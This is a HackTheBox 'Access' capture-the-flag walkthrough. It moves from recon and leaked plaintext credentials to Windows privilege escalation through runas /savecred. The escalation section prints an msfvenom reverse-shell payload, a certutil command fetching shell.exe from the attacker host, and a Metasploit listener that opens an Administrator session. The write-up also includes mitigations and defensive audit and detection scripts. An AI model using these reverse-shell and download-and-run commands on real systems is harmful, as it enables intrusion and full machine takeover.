HackTheBox - Access Walkthrough
Mar 2, 2019

1. Recon and Information gathering
Nmap
╭─root@warmachine ~/hackthebox/access
╰─# cat base_tcp.nmap
# Nmap 7.70 scan initiated Sun Feb 24 22:40:43 2019 as: nmap -sV -sC -oN base_tcp.nmap 10.10.10.98
Nmap scan report for 10.10.10.98
Host is up (0.037s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
| ftp-syst:
|_ SYST: Windows_NT
23/tcp open telnet?
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
SERVICES
IIS/HTTP
Running gobuster here while poking around the other services gets me only aspnet_client/system_web, which is pretty much useless for me. On to the interesting stuff…
Telnet
Connecting to telnet (port 23/tcp) leads me to a login prompt for "Welcome to Microsoft Telnet Service". Sadly, trying a couple of common passwords doesn’t result in a successful login.
FTP
Okay, so I have an FTP server with anonymous login. The error regarding the directory listing is caused by passive (PASV) mode - disabling it allows me to list the directories and see there are two of them:
lftp 10.10.10.98:~> set ftp:passive-mode off
lftp 10.10.10.98:~> ls
08-23-18 08:16PM <DIR> Backups
08-24-18 09:00PM <DIR> Engineer
Inside them I can see Access Control.zip and backup.mdb. The first is a password-protected archive and the second an MS Access database.
backup.mdb
I used mdb-tools (as most would do after googling how to open mdb in Kali :D) and after playing a bit with the different commands I found the table I needed:
╭─root@warmachine ~/hackthebox/access
╰─# mdb-export backup.mdb auth_user
id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,
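As an added example (not part of this walkthrough), the following Python script audits an export like the one above from the defender's side: it reads the CSV that mdb-export prints and flags plaintext storage, passwords equal to the username, and passwords shared between accounts. The sample rows are the three auth_user rows shown above; the list of hash prefixes is an assumption about which schemes count as "hashed".

```python
"""Audit a credential table exported with mdb-export (added example, not from the walkthrough).

The sample rows are the auth_user rows shown in the walkthrough; the checks flag
plaintext storage, password == username, and reuse of one password across accounts.
"""
import csv
import io
from collections import defaultdict

# The three rows printed by mdb-export above, in the same CSV layout.
SAMPLE_EXPORT = """id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,
"""

# Assumed prefixes of common password-hashing formats; a value that starts with
# none of them is treated as plaintext.
HASH_PREFIXES = ("$2a$", "$2b$", "$2y$", "$argon2", "$pbkdf2", "$scrypt", "$5$", "$6$")


def looks_hashed(value):
    """True when the stored value looks like a password hash rather than plaintext."""
    return value.startswith(HASH_PREFIXES)


def audit_auth_table(export_text):
    """Return a list of findings, one string per problem found in the table."""
    findings = []
    rows = list(csv.DictReader(io.StringIO(export_text)))
    users_by_password = defaultdict(list)
    for row in rows:
        user, password = row["username"], row["password"]
        if not looks_hashed(password):
            findings.append(f"{user}: password stored in plaintext")
        if password.lower() == user.lower():
            findings.append(f"{user}: password equals username")
        users_by_password[password].append(user)
    # Reuse: the same password value appearing under more than one account.
    for password, users in users_by_password.items():
        if len(users) > 1:
            findings.append(f"password shared by {', '.join(sorted(users))}")
    return findings


if __name__ == "__main__":
    for finding in audit_auth_table(SAMPLE_EXPORT):
        print(finding)
```

Run against the export above it reports five findings: three plaintext passwords, admin's password equal to its username, and the password shared by admin and backup_admin.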
Cha-ching - I have a password. Checking it against the archive yields success:
╭─root@warmachine ~/hackthebox/access
╰─# 7z e 'Access Control.zip'
and use access4u@security as the password.
╭─root@warmachine ~/hackthebox/access
╰─# readpst Access\ Control.pst
The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.
Now I have another user and password: security/4Cc3ssC0ntr0ller. Having seen the login prompt on the telnet service (and the lack of interesting stuff on the http end) I decided to try the credentials there. Well, it worked and I got user access :)
2. Gaining foothold/low priv user
╭─root@warmachine ~/hackthebox/access
╰─# telnet 10.10.10.98 23
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service
login: security
password:
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security> type C:\Users\security\Desktop\user.txt
<...>
C:\>systeminfo
Host Name: ACCESS
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600
3. Enumerating the system
Before starting the enumeration I tried creating and executing a rev shell (made with metasploit), but failed - guess I have to escalate before getting rid of the telnet :(
After some time poking here and there (the usual stuff - http://www.fuzzysecurity.com/tutorials/16.html etc.) and failing to find anything useful, I found an interesting shortcut for ZKAccess3.5 Security System on the Public user’s Desktop. After inspecting it, it looks like someone decided it’s a good idea to use runas (with saved credentials(!)) to give an unprivileged user access without providing authentication… wut?! Doing additional checks confirms it:
cmdkey /list
Currently stored credentials:
Target: Domain:interactive=ACCESS\Administrator
Type: Domain Password
User: ACCESS\Administrator
/savecred: Saves the password so it has to be entered only the first time the RunAs command is used.
The /savecred parameter is an extremely bad idea, as it creates a gaping security hole. In short, once you’ve used /savecred, any user at the computer can use the RunAs command to run any program with administrator privileges.
So let’s try and run the shell we couldn’t before:
4. Escalating privileges
- Create the shell (exe) on my Kali VM:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.22 LPORT=4747 -f exe > shell.exe
- Download it on Access via certutil (have to be in a directory you can write to ;)):
certutil.exe -urlcache -split -f "http://10.10.14.22:8000/shell.exe" shell.exe
- Set up msfconsole on my Kali VM so there is something listening for the reverse shell:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.10.14.22
lhost => 10.10.14.22
msf5 exploit(multi/handler) > set lport 4747
lport => 4747
msf5 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.22:4747
- Execute shell.exe as Administrator via runas:
C:\Users\security>runas /savecred /user:ACCESS\Administrator shell.exe
- Check the Metasploit sessions and verify the access level:
msf5 exploit(multi/handler) > [*] Sending stage (179779 bytes) to 10.10.10.98
[*] Meterpreter session 1 opened (10.10.14.22:4747 -> 10.10.10.98:49159) at 2019-02-25 21:11:56 +0200
msf5 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows ACCESS\Administrator @ ACCESS 10.10.14.22:4747 -> 10.10.10.98:49159 (10.10.10.98)
msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : ACCESS
OS : Windows 2008 R2 (Build 7600).
Architecture : x64
System Language : en_US
Domain : HTB
Logged On Users : 4
Meterpreter : x86/windows
- Profit :)
meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2018-08-21 23:43:14 +0300 desktop.ini
100666/rw-rw-rw- 32 fil 2018-08-22 01:07:24 +0300 root.txt
meterpreter > cat root.txt
<...>
5. Mitigations
User
Well, this should be a no-brainer: under no circumstances save credentials on a public share :) Don’t do this with backups either :D And while we’re at it: don’t store user passwords in plaintext, aaand.. don’t send sensitive data in plaintext mails ;)
- Use secure communication channels for sending sensitive data (the mail was in clear text; only its archive was password protected)
- Don’t store passwords in plaintext in databases
- Don’t store backups on public shares
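To make the "don’t store passwords in plaintext" point concrete, here is an added Python example (not code from the walkthrough) that puts a plaintext table like auth_user beside its hardened form: the rows are migrated to salted PBKDF2-HMAC-SHA256 hashes and logins are verified against the hash, so a leaked backup no longer hands out working credentials. The sample rows, the work factor and the hash string layout are assumptions made for the example.

```python
"""Plaintext credential table beside a hashed one (added example, not from the walkthrough).

The "before" keeps passwords as-is, like the auth_user table in the backup. The
"after" stores only salted PBKDF2-HMAC-SHA256 hashes and verifies logins against them.
"""
import base64
import hashlib
import hmac
import os

PBKDF2_ITERATIONS = 600_000  # assumed work factor; tune to the server's hardware

# Constructed rows in the shape of the plaintext table (placeholder passwords, not real ones).
PLAINTEXT_ROWS = [
    {"username": "admin", "password": "admin"},
    {"username": "engineer", "password": "correct-horse-battery"},
]


def _b64(raw):
    return base64.b64encode(raw).decode("ascii")


def hash_password(password, salt=None, iterations=PBKDF2_ITERATIONS):
    """Return a self-describing string: $pbkdf2-sha256$<iterations>$<salt>$<digest>."""
    salt = salt if salt is not None else os.urandom(16)  # fresh random salt per password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"$pbkdf2-sha256${iterations}${_b64(salt)}${_b64(digest)}"


def verify_password(password, stored):
    """Recompute the hash with the stored salt and compare in constant time."""
    try:
        _, scheme, iterations, salt_b64, digest_b64 = stored.split("$")
    except ValueError:
        return False  # malformed record, never treat as a match
    if scheme != "pbkdf2-sha256":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(digest_b64)
    actual = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iterations))
    return hmac.compare_digest(actual, expected)


def migrate_table(rows):
    """The "after": same usernames, but the password column holds only hashes."""
    return [{"username": r["username"], "password": hash_password(r["password"])} for r in rows]


def login(table, username, password):
    """Authenticate against the hashed table; unknown users fail like wrong passwords."""
    stored = next((r["password"] for r in table if r["username"] == username), None)
    if stored is None:
        hash_password(password)  # spend the same time so unknown users are not revealed by timing
        return False
    return verify_password(password, stored)


if __name__ == "__main__":
    hashed = migrate_table(PLAINTEXT_ROWS)
    for row in hashed:
        print(row["username"], row["password"])
    print("admin/admin ->", login(hashed, "admin", "admin"))
    print("admin/wrong ->", login(hashed, "admin", "wrong"))
```

Two identical plaintext passwords end up as different hashes because each row gets its own salt, so a dump of the hashed table no longer shows which accounts share a password either.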
Root
On RunAs: it’s a useful tool, but the /savecred option makes it a serious security hole, since it gives every user on the machine a way to run anything they want as Administrator.
- Don’t use the /savecred option on RunAs
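As an added detection example (not from the walkthrough), this Python script shows the two checks a defender can run for the /savecred problem described in section 3 and the mitigation above: it parses `cmdkey /list` output and reports Domain Password entries stored for privileged accounts, and it scans process-creation command lines for runas invoked with /savecred. The cmdkey text and the event records are constructed samples in the layout shown above, and the set of privileged account names is an assumption.

```python
"""Detect saved RunAs credentials and /savecred use (added example, not from the walkthrough).

Check 1: parse `cmdkey /list` output for Domain Password entries that belong to
privileged accounts. Check 2: scan process-creation command lines for runas /savecred.
"""
import re

# Constructed sample in the layout `cmdkey /list` prints (not captured from a real host).
SAMPLE_CMDKEY_OUTPUT = """
Currently stored credentials:

    Target: Domain:interactive=ACCESS\\Administrator
    Type: Domain Password
    User: ACCESS\\Administrator

    Target: LegacyGeneric:target=build-server.example.invalid
    Type: Generic
    User: builduser
"""

# Constructed records in the shape a process-creation event (Security 4688 / Sysmon 1) carries.
SAMPLE_PROCESS_EVENTS = [
    {"User": "ACCESS\\security", "CommandLine": "runas /savecred /user:ACCESS\\Administrator shell.exe"},
    {"User": "ACCESS\\security", "CommandLine": "runas /user:ACCESS\\Administrator cmd.exe"},
    {"User": "ACCESS\\Administrator", "CommandLine": "notepad.exe"},
]

# Assumed account names whose stored credentials are always worth a finding.
PRIVILEGED_ACCOUNTS = {"administrator", "system"}

FIELD_RE = re.compile(r"^\s*(Target|Type|User):\s*(.+?)\s*$")
SAVECRED_RE = re.compile(r"\brunas(?:\.exe)?\b.*\s/savecred\b", re.IGNORECASE)


def parse_cmdkey(text):
    """Group cmdkey /list output into dicts with target/type/user keys."""
    entries, current = [], {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2)
        if key == "target" and current:  # a new Target line starts a new entry
            entries.append(current)
            current = {}
        current[key] = value
    if current:
        entries.append(current)
    return entries


def saved_privileged_credentials(text):
    """Domain Password entries whose user part names a privileged account."""
    findings = []
    for entry in parse_cmdkey(text):
        account = entry.get("user", "").rsplit("\\", 1)[-1].lower()
        if entry.get("type") == "Domain Password" and account in PRIVILEGED_ACCOUNTS:
            findings.append(entry)
    return findings


def savecred_events(events):
    """Process-creation records where runas was given /savecred."""
    return [e for e in events if SAVECRED_RE.search(e["CommandLine"])]


if __name__ == "__main__":
    for entry in saved_privileged_credentials(SAMPLE_CMDKEY_OUTPUT):
        print("stored privileged credential:", entry["user"], "->", entry["target"])
    for event in savecred_events(SAMPLE_PROCESS_EVENTS):
        print("runas /savecred by", event["User"], ":", event["CommandLine"])
```

The first check is what cmdkey /list showed on the box (a Domain Password entry for ACCESS\Administrator); the second catches the misuse at the moment it happens, provided process creation auditing with command-line logging is enabled. A plain runas without /savecred, which prompts for the password, is deliberately not flagged.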